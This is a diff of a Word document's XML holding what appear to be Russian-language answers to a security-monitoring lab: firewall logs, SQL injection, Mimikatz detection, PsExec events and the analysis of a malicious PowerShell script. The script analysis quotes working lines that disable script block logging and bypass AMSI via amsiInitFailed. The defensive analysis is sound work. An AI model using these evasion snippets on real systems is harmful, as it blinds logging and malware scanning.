xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -24,15 +24,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Demilitarized</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
+        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (Demilitarized Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -126,15 +118,7 @@
         <w:t>Проверка на наличие атак(</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">признаки попыток осуществления </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>DDoS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
+        <w:t>признаки попыток осуществления DDoS-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
       </w:r>
       <w:r>
         <w:t>)</w:t>
@@ -599,15 +583,7 @@
         <w:t>Тестирование уязвимости</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Использовать инструменты для тестирования на уязвимости (например, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLMap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
+        <w:t>: Использовать инструменты для тестирования на уязвимости (например, SQLMap) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -706,23 +682,7 @@
         <w:t>Исправление уязвимостей</w:t>
       </w:r>
       <w:r>
-        <w:t>: Внедрить параметры для всех SQL-запросов, использовать ORM (Object-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Relational</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Mapping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), если это возможно.</w:t>
+        <w:t>: Внедрить параметры для всех SQL-запросов, использовать ORM (Object-Relational Mapping), если это возможно.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -989,23 +949,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Mimikatz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как Mimikatz.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1095,39 +1039,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Поиск файлов, связанных с инструментами дампа хэша, в системе (например, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Mimikatz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>ProcDump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>Поиск файлов, связанных с инструментами дампа хэша, в системе (например, Mimikatz, ProcDump).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1348,23 +1260,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Уведомления о странных </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>геолокациях</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> входа</w:t>
+        <w:t>Уведомления о странных геолокациях входа</w:t>
       </w:r>
       <w:r>
         <w:t>:</w:t>
@@ -1680,15 +1576,7 @@
         <w:t xml:space="preserve">.   </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Системы SIEM (Security Information </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Event Management) могут собирать и анализировать данные из различных источников:</w:t>
+        <w:t>Системы SIEM (Security Information and Event Management) могут собирать и анализировать данные из различных источников:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1743,39 +1631,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Проактивный поиск угроз (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Threat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Hunting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>Проактивный поиск угроз (Threat Hunting)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2097,15 +1953,7 @@
         <w:t xml:space="preserve">    Правило для обнаружения использования дефолтных учетных записей</w:t>
       </w:r>
       <w:r>
-        <w:t>: Срабатывает при входе под учетной записью с известным паролем (например, "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>")</w:t>
+        <w:t>: Срабатывает при входе под учетной записью с известным паролем (например, "admin")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2256,23 +2104,7 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>6.3 На каком этапе атаки «</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>kill</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chain</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>» находится этот случай?</w:t>
+        <w:t>6.3 На каком этапе атаки «kill chain» находится этот случай?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2569,35 +2401,7 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Этап атаки «</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>kill</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>chain</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>»:</w:t>
+        <w:t>Этап атаки «kill chain»:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2622,23 +2426,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Exploitation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>"</w:t>
+        <w:t>"Exploitation"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (эксплуатация) или </w:t>
@@ -2648,23 +2436,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Installation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>"</w:t>
+        <w:t>"Installation"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (установка).</w:t>
@@ -2811,39 +2583,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">UDP </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Snd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: Это указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>датаграмм</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>UDP Snd: Это указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских датаграмм).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2939,15 +2679,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Записи журнала делают запросы записей PTR (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pointer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
+        <w:t>Записи журнала делают запросы записей PTR (Pointer) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3090,6 +2822,39 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">1 и 10 сообщение с компьютера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kheirkhabarov</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>avp</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ru</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>о создании(1) и доступе(10) дампа памяти.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3107,6 +2872,75 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Здесь </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t>В системе установлена служба</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, обращается к </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PSEXESVC</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">это исполняемый файл(программа) удаленного доступа, и это событие создается каждый раз, когда используется </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PsExec</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, поэтому потребуется дополнительный анализ событий, чтобы определить, являются ли они вредоносными или легитимными</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, т.к.возможный вредоносный код </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Skeleton</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Key</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>обходит аутентификацию и не генерирует сетевой трафик.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3124,6 +2958,117 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>события: первое 4104(16марта2017) о создании скрипта</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">; второе 4103(11марта2017) о получении значения параметра реестра </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Get</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ItemProperty</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">(в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Software</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Microsoft</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Desktop</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>; третье 4188(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ноября</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">2016) - </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">создание </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>encrypted</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> процесса из 185.82.200.55 для запуска программы </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>roaming</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exe</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3148,71 +3093,69 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">Этот скрипт, по-видимому, является скриптом </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>Это скрипт PowerShell, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками PowerShell и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">, который включает несколько ключевых компонентов, вероятно, направленных на манипулирование настройками </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Проверка версии PowerShell</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> и выполнение потенциально вредоносного поведения. Вот разбивка его основных действий:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve"> powershell IF ($PSVersionTable.PSVersion.Major -ge 3) { Скрипт проверяет, является ли версия PowerShell 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Проверка версии </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Манипуляция параметрами групповой политики powershell</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>:</w:t>
       </w:r>
@@ -3220,161 +3163,35 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> $GPF=[REF].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static'); Эта строка извлекает непубличное статическое поле, которое содержит кэшированные параметры групповой политики. Затем он проверяет, включено ли ведение журнала блоков скриптов, и отключает его. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> IF ($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PSVersionTable.PSVersion.Major</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Изменение реестра powershell</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>ge</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3) { Скрипт проверяет, является ли версия </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3 или выше, что является распространенным способом обеспечения совместимости с определенными функциями. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Манипуляция параметрами групповой политики </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $GPF=[REF].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static'); Эта строка извлекает непубличное статическое поле, которое содержит кэшированные параметры групповой политики. Затем он проверяет, включено ли ведение журнала блоков скриптов, и отключает его. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Изменение реестра </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging']=$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
+        <w:t xml:space="preserve"> $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging']=$Val Скрипт изменяет параметры реестра, связанные с ведением журнала блоков скриптов PowerShell, эффективно отключая функции ведения журнала, которые обычно регистрируют выполнение скрипта. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3413,61 +3230,91 @@
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') | ?{$_} | %{ $_.GetField('amsiInitFailed','NonPublic,Static').SetValue($NULL,$True) }; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Эта</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>powershell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>часть</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> [Ref].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>пытается</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Assembly.GetType</w:t>
-      </w:r>
